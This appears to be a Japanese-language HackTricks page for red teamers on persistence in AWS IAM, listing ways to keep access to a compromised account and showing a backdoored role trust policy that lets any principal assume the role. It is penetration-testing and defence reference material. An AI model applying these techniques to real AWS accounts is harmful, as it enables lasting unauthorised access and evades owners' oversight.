AWS - IAM Persistence

htARTE (HackTricks AWS Red Team Expert)で AWSハッキングをゼロからヒーローまで学ぶ

HackTricksをサポートする他の方法:

IAM

詳細は以下を参照してください:

pageAWS - IAM, Identity Center & SSO Enum

一般的なIAM永続性

  • ユーザーを作成する

  • 管理下のユーザーを特権グループに追加する

  • アクセスキーを作成する(新しいユーザーまたは全ユーザーの)

  • 管理下のユーザー/グループに追加の権限を付与する(ポリシーを添付またはインラインポリシー)

  • MFAを無効にする / 自分のMFAデバイスを追加する

  • ロールチェーンジャグリング状況を作成する(以下のSTS永続性で詳細)

バックドアロールトラストポリシー

外部リソース(または誰でも)があなたが制御するものを想定できるように、トラストポリシーをバックドアすることができます:

{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"AWS": [
"*",
"arn:aws:iam::123213123123:root"
]
},
"Action": "sts:AssumeRole"
}
]
}

バックドアポリシーバージョン

最後のバージョンが正当に見えるようにしておき、そのポリシーの最後でないバージョンに管理者権限を与え、そのバージョンをコントロール下にあるユーザー/グループに割り当てます。

バックドア / アイデンティティプロバイダーの作成

アカウントがすでに一般的なアイデンティティプロバイダー(例えばGithub)を信頼している場合、信頼の条件を増やして攻撃者が悪用できるようにすることができます。

htARTE (HackTricks AWS Red Team Expert)でAWSハッキングをゼロからヒーローまで学ぶ こちら

HackTricksをサポートする他の方法:

最終更新